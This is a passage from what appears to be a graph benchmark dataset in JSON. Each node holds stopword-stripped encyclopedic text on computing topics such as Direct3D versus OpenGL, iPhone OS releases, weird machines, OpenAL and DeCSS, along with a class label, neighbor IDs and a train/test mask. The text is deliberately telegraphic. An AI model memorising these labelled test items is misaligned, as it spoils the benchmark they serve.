hecker open letter microsoft referred drawprimitive immature poorly-designed clone opengl missing architectural decisions make opengl fast despite controversy microsoft continued evolve api detailed history releases added features given microsoft direct3d web pages former critics direct3d acknowledge direct3d good better opengl abilities ease use january 2007 john carmack said …dx9 really quite good api level even direct3d side things know long history people thinking 'm antagonistic microsoft done good job sensibly evolving step—they 're worried breaking backwards compatibility—and pretty clean api especially like work 'm 360 probably best graphics api far sensibly designed thing 've worked design features direct3d remained unchanged since version one notably reliance microsoft component object model com one advantage using com api used com-aware language notably object pascal delphi microsoft visual c++ c visual basic .net opengl specification implemented programming language c though used languages built concept state machine api opengl depends one programming language feature made callable almost language proper bindings bindings exist current programming languages general direct3d designed virtualize 3d hardware interfaces direct3d frees game programmer accommodating graphics hardware opengl hand designed 3d hardware-accelerated rendering system may emulated software two apis fundamentally designed two separate modes thought functional differences two apis work one functional difference apis manage hardware resources direct3d expects application opengl makes implementation tradeoff opengl decreases difficulty developing api time increasing complexity creating implementation driver performs well direct3d developer must manage hardware resources independently however implementation simpler developers flexibility allocate resources efficient way possible application 2005 another functional difference apis way handled rendering textures direct3d method codice_2 convenient prior versions opengl required manipulating pixel buffers p-buffers cumbersome risky codepath used program different anticipated driver maker code would fall back software rendering causing substantial performance drop however broad support frame buffer objects extension provided opengl equivalent direct3d method successfully addressed shortcoming render target feature opengl brought par direct3d aspect outside minor functional differences mostly addressed years two apis provide nearly level function hardware software makers generally respond rapidly changes directx e.g. pixel processor shader requirements directx 9 stream processors directx 10 tessellation directx 11 contrast new features opengl usually implemented first vendors retroactively applied standard shortly establishment direct3d opengl viable graphics libraries circa 1995 microsoft sgi engaged called api wars much argument revolved around api offered superior performance question relevant due high cost dedicated graphics processors time meant consumer market using software renderers implemented microsoft direct3d opengl dos business software autocad dos games id software quake originally optimized run many different graphics chipsets hardware makers 3dlabs member opengl architecture review board made opengl compatible graphics accelerators e.g. glint chip developers john carmack id software optimized products opengl multitasking user environments windows x window system x11 unix-like systems became prevalent relevance hardware faded microsoft marketed direct3d faster based in-house performance comparisons two software libraries performance deficit blamed rigorous specification conformance required opengl perception changed 1996 special interest group graphics interactive techniques siggraph conference time silicon graphics sgi challenged microsoft optimized windows software implementation opengl called cosmogl various demos matched exceeded performance direct3d sgi critical milestone showed opengl poor software rendering performance due microsoft reference opengl implementation due alleged design flaws opengl contrast software rendering 3d api largely irrelevant direct3d opengl applications many directx applications used direct3d software rendering preferring perform software rendering using directdraw facilities access display hardware opengl applications hardware support expected hardware much faster software fallback opengl application constituted rude surprise opengl developer case time sgi demonstrated opengl software rendering performance could competitive direct3d software rendering fast becoming irrelevant due wide availability low cost 3d graphics hardware 1998 even s3 virge graphics accelerator substantially faster fastest pentium ii running direct3d mmx rasterizer substantive modern performance difference arises structure hardware drivers provided hardware developers directx independent hardware vendor ihv drivers kernel-mode drivers installed operating system user-mode part api handled directx runtime provided microsoft opengl however ihv driver divided two parts user-mode part implements opengl api kernel-mode driver called user-mode part issue calling kernel-mode operations user-mode requires performing system call i.e. making cpu switch kernel mode slow operation taking order microseconds complete time cpu perform operations minimizing number times switching operation occurs would improve performance example gpu command buffer full rendering data api could simply store requested rendering call temporary buffer command buffer nearly empty perform switch kernel-mode add set stored commands batch termed marshalling direct3d ihv drivers kernel-mode user-mode code ihv hand chance optimizations occur direct3d runtime user-mode part implements api explicit knowledge driver inner workings effectively support marshalling means every direct3d call sends commands hardware must perform kernel-mode switch takes time order microseconds complete led several behaviors regarding use direct3d important need submitting large batches triangles one function call since opengl ihv drivers user-mode component ihvs ability implement marshalling thus improving performance still kernel-mode switching theoretical maximum number switches opengl implementations simply equal direct3d standard behavior direct3d 10 release included windows vista allows parts drivers run user-mode making possible ihvs implement marshalling thus bringing two back relative performance parity mac os x opengl system similar ihvs implement simpler version opengl api user kernel mode components apple additions runtime provide direct interface user code basic work make ihvs jobs easier introduction mantle amd lead increased discussion modernizing apis updating abstraction concepts used apis reflect graphics processing unit gpu operations microsoft opengl vendors began showcase visions limiting removing altogether driver overhead amount work cpu needs prepare gpu commands march 2014 microsoft presented basic assumptions goals directx12 3d component ready december 2015 opengl vendors took different approach gdc 2014 presented mix features mandatory opengl 4.3 opengl 4.4 already arb extensions show fast paths already present implementations nvidia amd intel later amd donated mantle khronos group api renamed vulkan current cross-platform api dedicated reduce driver overhead better distributing work among multiple cpu gpu cores using unified management compute kernels graphical shaders presentation apitest introduced new tool microbenchmarking specific solutions given problems emphasizing exploration fast paths current apis opengl 4.x direct3d 11 supported gathered results showed modern opengl many times faster direct3d 11 opengl originally designed then-powerful sgi workstations includes many features like stereo rendering imaging subset generally considered limited use games although stereoscopic gaming drawn interest development consumer-level 3d displays api whole contains 250 calls subset perhaps 100 useful game development however official gaming-specific subset ever defined minigl released 3dfx stopgap measure support glquake might served starting point additional features like stencil soon adopted games support full opengl standard continued today workstations consumer machines use architectures operating systems modern versions opengl standard still include features although special workstation-class video cards accelerate opengl extension mechanism probably heavily disputed difference two apis opengl includes mechanism driver advertise extensions api thus introducing new functions blend modes new ways transfer data gpus different texture wrapping parameters allows new functions exposed quickly lead confusion different vendors implement similar extensions different apis many extensions periodically standardized opengl architecture review board arb made core part future opengl revisions hand direct3d specified one vendor microsoft leading consistent api denying access vendor-specific features nvidia ultrashadow technology instance available stock direct3d apis time writing noted direct3d support texture format extensions via fourcc little-known rarely used used s3 texture compression graphics cards added support pixel shaders known opengl fragment shaders direct3d provided one pixel shader 1.1 ps1.1 standard geforce 3 radeon 8500 advertised compatibility opengl functions accessed variety custom extensions theory microsoft approach allows one code path support brands card whereas opengl programmers must write two separate systems reality though limits pixel processing early cards pixel shader 1.1 nothing pseudo-assembly language version nvidia-specific opengl extensions part cards claimed ps 1.1 functionality nvidia built natively radeon 8500 released microsoft released update direct3d included pixel shader 1.4 nothing pseudo-assembly language version ati-specific opengl extensions cards claimed ps 1.4 support ati cards designed precise hardware needed make functionality happen situation existed short time apis second-generation pixel shading cards functioned far similarly architecture evolving toward kind pixel processing conclusion pixel shader 2.0 allowed unified code path direct3d around time opengl introduced arb-approved vertex pixel shader extensions codice_3 codice_4 sets cards supported standard also opengl always seen use professional graphics market directx directx used mostly computer games term professional used refer professional production display graphics computer animated films scientific visualisation opposed games graphics produced end user personal rather professional use currently opengl directx large enough overlap functionality either could used common purposes operating system often main criterion dictating used directx common choice windows opengl nearly everything else esoteric applications still divide applicability two apis accelerated 3d across network connection directly supported opengl opengl extension x window system glx example past many professional graphics cards supported opengl 2010 virtually professional cards work windows platform also support direct3d part change professional graphics market largely unix-based hardware like sgis suns lower cost pc-based systems leading growth windows market segment time providing new market opengl software unix-based consumer systems running linux mac os x principal historical reason opengl dominance professional market performance many professional graphics applications example softimage|3d alias poweranimator originally written iris gl high-end sgi workstations far capable graphically raw cpu power pcs time later many ported opengl even personal computer evolving system powerful enough run professional graphics applications users able run maya example successor alias poweranimator either sgis windows-based personal computers today linux mac os x windows price competition eventually broke sgi dominance market established base opengl software engineers broadening user base opengl apple linux operating systems resulted market directx opengl viable widespread apis reason opengl historic advantage marketing design directx set apis marketed professional graphics applications indeed even designed uses directx api designed low-level high-performance access broadly available lower-performance consumer-priced graphics hardware purpose game development opengl much general purpose 3d api targeting full range graphics hardware low-end commodity graphics cards professional scientific graphics visualization well range average consumer providing features necessarily exclusive specific kind user gaming developers typically n't demanded wide api professional graphics system developers many games n't need overlay planes stencils although n't prevented game developers using available specifically game designers rarely interested pixel invariance demanded certain parts opengl standards conversely highly useful film computer-aided modeling attempt made merge opengl directx sgi microsoft fahrenheit graphics api intended bring together high end ability opengl broad low-level support directx microsoft eventually retreated project never allocated sufficient resources produce part rendering engine move widely held purposed ensure lock-in developers windows-directx platform would lost fahrenheit api became world de facto standard graphics api however fahrenheit led many improvements directx main architect fahrenheit works microsoft directx earliest days 3d accelerated gaming performance reliability key benchmarks several 3d accelerator cards competed dominance software written specific brand graphics card however years opengl direct3d emerged software layers hardware mainly industry support cross-hardware graphics library competition two rose game developer would choose either one early days 3d accelerated gaming vendors supply full opengl driver reason twofold firstly consumer-oriented accelerators implement enough functionality properly accelerate opengl secondly many vendors struggled implement full opengl driver good performance compatibility instead wrote minigl drivers implemented subset opengl enough run glquake later opengl games mostly based quake engine proper opengl drivers became prevalent hardware evolved consumer-oriented accelerators caught sgi systems opengl originally designed would around time directx 6 directx 7 console world proprietary native apis dominant consoles e.g. ps3 providing opengl wrapper around native api original xbox supported direct3d 8.1 native api xbox 360 supports directx9 native api console developers prefer use native apis console maximize performance making opengl direct3d comparisons relevant mostly pc platforms opengl embedded systems called opengl es subset opengl 3d graphics api designed embedded devices various versions smartphone operating systems support opengl es android ios ipad iphone ipod touch maemo nokia n900 symbian opengl es available 6 variants opengl es 1.0 1.1 2.0 3.0 3.1 3.2 release 2.0 removed backward compatibility older variants due extensive programmable pipeline functions available gl es 2.0 fixed-pipeline functions gl es 1.0 1.1 opengl es 3.0 needed new hardware opengl es 2.0 opengl es 3.1 meant software update needing new drivers direct3d mobile direct3d derivative supported windows ce currently windows phone 7 devices use .net framework ui accelerated direct3d mobile 9 adreno 200/205 integrated gpus qualcomm windows phone 8 implements direct3d 11 limited feature level 9_3",
    "neighbors": [
      8576,
      9732,
      6539,
      6797,
      5397,
      2208,
      10658,
      7983,
      823,
      1083,
      8125,
      10173,
      321,
      1346,
      10051,
      8262,
      2259,
      11487,
      1632,
      3300,
      10727,
      11247,
      5492,
      3573,
      8438,
      508,
      2045,
      2943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2362,
    "label": 5,
    "text": "Host_Monitoring_Protocol:host monitoring protocol host monitoring protocol hmp obsolete tcp/ip protocol described rfc 869",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 2363,
    "label": 2,
    "text": "IPhone_OS_1:iphone os 1 iphone os 1 first major release ios apple mobile operating system iphone os 1.1.5 latest last version apple iphone os 1 version ios first iteration touch-centric mobile operating system official name given initial release apple marketing literature simply stated iphone runs version apple desktop operating system macos known mac os x march 6 2008 release iphone software development kit iphone sdk apple named iphone os later went rename ios june 7 2010 succeeded iphone os 2 july 11 2008 iphone os 1.1.3 update cost 19.95 ipod touch users",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      6675,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8767,
      576,
      5696,
      8774,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      3681,
      9826,
      8806,
      3691,
      8304,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      3722,
      7307,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      3241,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      1290,
      3338,
      9487,
      784,
      9999,
      10512,
      4888,
      5912,
      10023,
      4399,
      7983,
      7991,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      838,
      7496,
      4957,
      6495,
      9063,
      10602,
      3948,
      10608,
      5492,
      2439,
      6023,
      7561,
      6539,
      7052,
      7057,
      3483,
      2979,
      9123,
      11171,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 2364,
    "label": 9,
    "text": "BAPP:bapp acronyms bapp b.a.p.p bamp b.a.m.p refer set open-source software programs commonly used together run dynamic web sites servers set solution stack open source web platform bapp refers bamp refers two acronyms three major uses operating system freebsd bsd descendant generally regarded reliable robust operating systems accurately report uptime remotely freebsd bsd descendants common free operating system listed netcraft list 50 web servers longest uptime uptime operating systems versions linux determined remotely making top choice among isps hosting providers long uptime also indicates kernel updates deemed necessary installing new kernel requires reboot resets uptime counter system though originators open source programs design work specifically combination become popular low acquisition cost ubiquity components come bundled current bsd distributions particularly deployed isps used combination represent solution stack technologies support application servers stacks include unified application development environments apple computer webobjects java/java ee grails microsoft .net architecture scripting component bapp stack origins cgi web interfaces became popular early 1990s technology allows user web browser execute program web server thereby receive dynamic well static content programmers used scripting languages programs ability manipulate text streams easily efficiently even originate disparate sources reason system designers often referred scripting systems glue languages variants term include",
    "neighbors": [
      225,
      865,
      6850,
      8644,
      9345,
      8582,
      6281,
      6797,
      7022,
      7983,
      9389,
      119,
      2485,
      9780,
      823,
      8539,
      4439,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 2365,
    "label": 2,
    "text": "IPhone_OS_2:iphone os 2 iphone os 2 second major release ios mobile operating system developed apple inc. successor iphone os 1 first release ios support third-party applications via app store iphone os 2.2.1 final version iphone os 2 succeeded iphone os 3 june 17 2009. iphone os 2.0 became available july 11 2008 release iphone 3g devices running 1.x upgradable version version ios introduces app store making third-party applications available iphone ipod touch prior public release iphone os 2.0 apple held keynote event announce iphone os software development kit sdk developers notable feature iphone os 2 app store feature introduced way install custom applications device via jailbreaking strongly discouraged unsupported apple 500 applications available download launch app store though amount grown dramatically since app store 2 million apps 2016 mail app makeover push-emails provide always-on capability also supports microsoft office attachments well iwork attachments new features including support bcc multiple email delete ability select outgoing email contacts app new home screen icon available ipod touch along release ability search contacts without searched one-by-one well sim contacts import ability new features added maps app iphone os 2.2 software update among features added inclusion google street view directions public transit walking ability display address dropped pin device landscape mode calculator app displays scientific calculator also app icon updated settings ability turn wifi back airplane mode well ability turn on/off location services within app rene ritchie imore said overall iphone firmware 2.0 stunning achievement really puts iphone par apple ii mac one great revolutions modern technology takes beyond simple phone ipod even smartphone makes leading contender next great shift computing however criticized stability issues overall sluggishness macworld said iphone 2.0 software full kind refinements ’ expect second-generation apple product iphone os still ’ perfect wish apple addressed lingering shortcomings ’ welcome step-up already arguably best mobile platform market iphone os 2 cost 9.95 ipod touch users free iphone users",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      6675,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8767,
      576,
      5696,
      8774,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      3241,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      3790,
      7378,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2366,
      9022,
      1346,
      10562,
      10052,
      838,
      7496,
      4957,
      6495,
      9063,
      10602,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      7057,
      3483,
      2979,
      9123,
      11171,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2366,
    "label": 2,
    "text": "IPhone_OS_3:iphone os 3 iphone os 3 third major release ios mobile operating system developed apple inc. successor iphone os 2 announced march 17 2009 released june 17 2009 succeeded ios 4 june 21 2010 new version dropped iphone os naming convention iphone os 3 last version use iphone os naming convention iphone os 3 added system-wide cut copy paste dialog bubble allowing users easily move content also introduced spotlight search indexing feature designed help users locate specific information device contacts email messages apps home screen expanded let users add 11 pages showcasing total 180 apps messages app received support mms camera app received support video recording iphone 3gs new voice memos app let users record voice iphone os 3 announced march 17 2009 beta version available developers day iphone os 3 officially released june 17 2009. iphone os 3 introduced cut copy paste bubble dialog users double-tap text paste button would incorporate anything stored device clipboard marked area spotlight system-wide indexing search feature aiming help users search device specific contacts email messages calendar appointments multimedia files apps accessed swiping right home screen iphone os 3 expands maximum number pages home screen 11 total number 180 apps messages app received native support multimedia messaging service mms allowing users send receive messages also contain pictures contacts locations voice recordings video messages camera app introduced video recording iphone 3gs photos app featured new copy button ability delete multiple photos iphone os 3 added voice memos app allowing users record voice upgrading iphone os 3 free iphone upgrading iphone os 3 cost ipod touch users 5 10 depending device purchase date iphone os 3 last ios charge ipod touch users upgrade starting ios 4 ios upgrades became free users including users ipod touch",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      6675,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8767,
      576,
      5696,
      8774,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      3241,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      3790,
      7378,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      10009,
      10023,
      4399,
      7991,
      2363,
      2365,
      9022,
      1346,
      10562,
      10052,
      838,
      7496,
      4957,
      6495,
      9063,
      10602,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      7057,
      3483,
      2979,
      9123,
      11171,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      487,
      488,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2367,
    "label": 4,
    "text": "Weird_machine:weird machine computer security weird machine computational artifact additional code execution happen outside original specification program closely related concept weird instructions building blocks exploit based crafted input data expected valid input activates normal intended functionality computer program input unexpected program developer may activate unintended functionality weird machine consists unintended functionality programmed selected inputs exploit classical attack taking advantage stack buffer overflow input given vulnerable program crafted delivered becomes executed program code however data areas program memory protected executed directly like input may instead take form pointers pieces existing program code become executed unexpected order generate functionality exploit snippets code used exploit referred gadgets context return-oriented programming interpretation data code weird machine functionality definition outside original program specification reached also proof-carrying code pcc formally proven function certain specific way disparity essentially caused disconnect formal abstract modelling computer program real-world instance influenced events captured original abstraction memory errors power outages two central categories mitigation problems caused weird machine functionality include input validation within software protecting problems arising platform program runs memory errors input validation aims limit scope forms unexpected inputs e.g whitelists allowed inputs software program would end unexpected state interpreting data internally equally importantly secure programming practices protecting buffer overflows make less likely input data becomes interpreted unintended ways lower layers hardware program executed",
    "neighbors": [
      1474,
      642,
      522,
      1103,
      3473,
      4562,
      1820,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2368,
    "label": 2,
    "text": "OpenAL:openal openal open audio library open open-source cross-platform audio application programming interface api designed efficient rendering multichannel three-dimensional positional audio api style conventions deliberately resemble opengl openal environmental 3d audio library add realism game simulating attenuation degradation sound distance doppler effect change frequency result motion material densities openal aimed originally open standard open-source replacement proprietary generally incompatible one another 3d audio systems eax a3d reference implementation later became proprietary open source implementations openal soft available openal originally developed 2000 loki software help business porting windows games linux demise loki project maintained time free software/open source community implemented nvidia nforce sound cards motherboards hosted largely developed creative technology on-going support apple blue ripple sound via rapture3d openal driver individual open-source developers openal charter says architecture review board arb modeled opengl arb organization ever formed openal specification generally handled discussed via email public mailing list since 1.1 implementation creative turned proprietary last releases free licenses still accessible project subversion source code repository however openal soft widely used open source alternative general functionality openal encoded source objects audio buffers single listener source object contains pointer buffer velocity position direction sound intensity sound listener object contains velocity position direction listener general gain applied sound buffers contain audio data pcm format either 8- 16-bit either monaural stereo format rendering engine performs necessary calculations far distance attenuation doppler effect etc net result end user properly written openal application sounds behave quite naturally user moves three-dimensional space virtual world programmer perspective little additional work required make happen existing opengl-based 3d graphical application unlike opengl specification openal specification includes two subsections api core consisting actual openal function calls alc audio library context api used manage rendering contexts resource usage locking cross platform manner also 'alut audio library utility toolkit library provides higher level 'convenience functions — exactly analogous opengl 'glut order provide additional functionality future openal utilizes extension mechanism individual vendors thereby able include extensions distributions openal commonly purpose exposing additional functionality proprietary hardware extensions promoted arb architecture review board status indicating standard extension maintained backwards compatibility arb extensions prospect added core api period time advanced digital signal processing hardware-accelerated sound effects efx effects extension environmental audio extensions eax used single listener model openal tailored single human user fit artificial intelligence robotic simulations multiple human participants collaborative musical performances cases multiple listener model required openal also fails take account sound propagation delays speed sound used doppler effect distance sound source translates amplitude effect attenuation delay hence openal used time difference arrival calculations unless functionality added separately api available following platforms operating systems android supports opensl es amigaos 3.x 4.x bada blackberry 10 blackberry playbook bsd ios supports core audio irix linux supports alsa oss portaudio pulseaudio mac os 8 mac os 9 mac os x core audio microsoft windows supports directsound windows multimedia api windows multimedia device mmdevice api morphos openbsd solaris qnx aros supported gaming devices instance gamecube playstation 2 playstation 3 xbox xbox 360 wii playstation portable following video games known use openal",
    "neighbors": [
      10369,
      10371,
      3210,
      6797,
      3734,
      162,
      6180,
      2221,
      8621,
      7983,
      4919,
      823,
      7991,
      6971,
      2368,
      9408,
      7108,
      9799,
      10316,
      593,
      11602,
      4182,
      4699,
      10076,
      3167,
      10080,
      2658,
      9320,
      8937,
      5612,
      10480,
      8561,
      10359,
      10360,
      10363,
      2045,
      6910,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 2369,
    "label": 1,
    "text": "Outline_of_databases:outline databases following outline provided overview topical guide databases database – organized collection data today typically digital form data typically organized model relevant aspects reality example availability rooms hotels way supports processes requiring information example finding hotel vacancies databases described following database languages – database security – database design – database management system – data warehouse –",
    "neighbors": [
      5632,
      8201,
      2068,
      5658,
      5151,
      5157,
      8742,
      10286,
      11324,
      9286,
      72,
      10326,
      7767,
      11360,
      11362,
      9828,
      8808,
      2669,
      2681,
      1146,
      10389,
      5271,
      1697,
      5794,
      4263,
      10413,
      5808,
      10418,
      9397,
      3768,
      9942,
      2780,
      10471,
      6383,
      7412,
      9467,
      6395,
      1283,
      9481,
      10505,
      8979,
      7446,
      10518,
      4376,
      5403,
      7968,
      290,
      1314,
      7461,
      2344,
      1341,
      10048,
      5441,
      5953,
      8518,
      853,
      2901,
      860,
      7022,
      9075,
      9079,
      10628,
      10632,
      2446,
      2456,
      9112,
      9631,
      7080,
      5550,
      9147,
      3004,
      9663,
      2512,
      9177,
      987,
      9183,
      4065,
      7650,
      6124,
      2544,
      10737
    ],
    "mask": "None"
  },
  {
    "node_id": 2370,
    "label": 4,
    "text": "DeCSS:decss decss one first free computer programs capable decrypting content commercially produced dvd video disc release decss linux-based computing systems could play encrypted video dvds decss development done without license dvd copy control association cca organization responsible dvd copy protection—namely content scramble system css used commercial dvd publishers release decss resulted norway criminal trial subsequent acquittal one authors decss dvd cca launched numerous lawsuits united states effort stop distribution software decss devised three people two remain anonymous released internet mailing list livid october 1999 one known author trio norwegian programmer jon lech johansen whose home raided 2000 norwegian police still teenager time put trial norwegian court violating norwegian criminal code section 145 faced possible jail sentence two years large fines acquitted charges early 2003 5 march 2003 norwegian appeals court ruled johansen would retried court said arguments filed prosecutor additional evidence merited another trial 22 december 2003 appeals court agreed acquittal 5 january 2004 norway økokrim economic crime unit decided pursue case program first released 6 october 1999 johansen posted announcement decss 1.1b closed source windows-only application dvd ripping livid-dev mailing list source code leaked end month first release decss preceded weeks program called dod dvd speed ripper group called drinkordie also faced later raids piracy prosecutions jail one member even extradited australia usa prosecution despite never set foot n't include source code apparently work dvds drink die reportedly disassembled object code xing dvd player obtain player key group wrote decss including johansen came call masters reverse engineering may obtained information drink die css decryption source code used decss mailed derek fawcus decss released decss source code leaked fawcus noticed decss included css-auth code violation gnu gpl johansen made aware contacted fawcus solve issue granted license use code decss non-gpl terms 22 january 2004 dvd cca dropped case jon johansen decss program collaborative project johansen wrote graphical user interface transcripts borgarting court appeal published norwegian newspaper verdens gang contain following description process led release decss internet relay chat henceforth irc jon lech johansen made contact like-minded people seeking develop dvd-player linux operating system 11 september 1999 conversation mdx encryption algorithm css could found using poorly secured software-based dvd-player conversation jon lech johansen mdx 22 september mdx informs nomad found code css decryption mdx would send code jon lech johansen nomad allegedly found decryption algorithm so-called reverse engineering xing dvd-player decryption keys less openly accessible information made possible mdx create code css_scramble.cpp retrieved chat logs dated 4 november 1999 25 november 1999 appears nomad carried reverse engineering process xing player characterized illegal case presented high court known jon lech johansen 4 november 1999 regarding authentication code high court takes basis nomad obtained code electronic mailing list livid linux video internet created derek fawcus appears livid posting dated 6 october 1999 derek fawcus date read decss source code compared appears creators decss taken derek fawcus code almost verbatim alteration removal derek fawcus copyright header paragraph containing commentaries change function names name code css_auth.cpp high court takes basis program jon lech johansen later programmed graphical user interface consisted nomad decryption algorithm derek fawcus authentication package creation graphical user interface made program accessible also users without special knowledge programming program published internet first time 6 october 1999 jon lech johansen tested movie matrix downloaded approximately 2.5 200 megabytes movie hard drive computer file film fragment jon lech johansen saved computer release decss source code made css algorithm available public scrutiny soon found susceptible brute force attack quite different decss encryption 40-bit use keys high-end home computer 1999 running optimized code could brute-force within 24 hours modern computers brute-force seconds less programmers around world created hundreds programs equivalent decss merely demonstrate trivial ease system could bypassed others add dvd support open source movie players licensing restrictions css make impossible create open source implementation official channels closed source drivers unavailable operating systems users need decss watch even legally obtained movies first legal threats sites hosting decss beginning decss mirroring campaign began early november 1999 universal v. reimerdes preliminary injunction dvd copy control association inc. v. bunner followed soon january 2000 response threats program also called decss unrelated function developed program used strip cascading style sheets tags html pages one case school removed student webpage included copy program mistaking original decss program received great deal negative media attention css stripping program specifically created bait mpaa manner protest legislation prohibits publication copy protection circumvention code countries implement wipo copyright treaty united states digital millennium copyright act devised clever ways distributing descriptions decss algorithm steganography various internet protocols t-shirts dramatic readings midi files haiku poem decss haiku even so-called illegal prime number lawrence lessig future ideas 2001 p. 187-190 freely available",
    "neighbors": [
      8037,
      2885,
      6797,
      823,
      2587,
      10173,
      8923
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2371,
    "label": 9,
    "text": "Chris_Tomic:chris tomic chris tomic born 1978 german computer scientist inventor entrepreneur reality tv personality featured several television shows mostly german news channel n-tv television studies germany heinrich-heine-universität düsseldorf started developing technologies internet mobile industry düsseldorf company novadoc gmbh 2001 tomic created ucp protocol set standard worldwide first delivery binary messages mobile handsets operator-logos monophonic ringtones 1998 executive director company novadoc gmbh focused research development secure mobile payments micropayments sms mobile payments 2001 became cto company monstermob ltd uk 2003 monstermob ltd floated london stock exchange opening market capitalisation £32m spanish internet firm lanetro zed bought majority 53 stake business agreement mean lanetro zed monstermob ltd together become world largest company mobile value-added services mvas market terms revenue enlarged company operating 31 countries around world employing 1,200 staff",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 2372,
    "label": 9,
    "text": "Rasmus_Lerdorf:rasmus lerdorf rasmus lerdorf born 22 november 1968 danish-canadian programmer co-authored inspired php scripting language authoring first two versions language participated development later versions led group developers including jim winstead later created blo.gs stig bakken shane caraveo andi gutmans zeev suraski continues contribute project lerdorf born disko island greenland moved denmark early years lerdorf family moved canada denmark 1980 later moved king city ontario 1983 graduated king city secondary school 1988 1993 graduated university waterloo bachelor applied science systems design engineering contributed apache http server added limit clause msql dbms variant limit clause already around decade mainframe relational database management systems like oracle rdb running vax/vms formerly digital equipment corporation apparently yet picked emerging pc-based databases later adapted several sql-compatible dbms released first version php 1995 september 2002 november 2009 lerdorf employed yahoo inc. infrastructure architecture engineer 2010 joined wepay order develop application programming interface throughout 2011 roving consultant startups 22 february 2012 announced twitter joined etsy july 2013 rasmus joined jelastic senior advisor help creation new technology lerdorf frequent speaker open source conferences around world keynote presentation oscms 2007 presented security vulnerability projects represented conference year lerdorf also appeared wearedevelopers conferences 2017 2019 making speech history php new php 7 release 2017 25 years php.. 2003 lerdorf named mit technology review tr100 one top 100 innovators world age 35",
    "neighbors": [
      6154,
      9614,
      3986,
      8986,
      8735,
      2465,
      2727,
      190,
      8644,
      1353,
      4171,
      10587,
      11357,
      865,
      3553,
      7785,
      7147,
      4853,
      8057,
      11259,
      7293
    ],
    "mask": "None"
  },
  {
    "node_id": 2373,
    "label": 5,
    "text": "SILC_(protocol):silc protocol silc secure internet live conferencing protocol protocol provides secure synchronous conferencing services much like irc internet silc protocol divided three main parts silc key exchange ske protocol silc authentication protocol silc packet protocol silc protocol additionally defines silc commands used manage silc session silc provides channels groups nicknames private messages common features however silc nicknames contrast many protocols e.g irc unique user able use nickname even one already use real identification protocol performed unique client id silc protocol uses overcome nickname collision problem present many protocols messages sent silc network binary allowing contain type data including text video audio multimedia data ske protocol used establish session key security parameters protecting silc packet protocol ske based diffie-hellman key exchange algorithm form asymmetric cryptography exchange protected digital signatures silc authentication protocol performed successful ske protocol execution authenticate client and/or server authentication may based passphrase digital signatures successful gives access relevant silc network silc packet protocol intended secure binary packet protocol assuring content packet consisting packet header packet payload secured authenticated packets secured using algorithms based symmetric cryptography authenticated using message authentication code algorithm hmac silc channels groups protected using symmetric channel keys optionally possible digitally sign channel messages also possible protect messages privately generated channel key previously agreed upon channel members private messages users silc network protected session keys however possible execute ske protocol two users use generated key protect 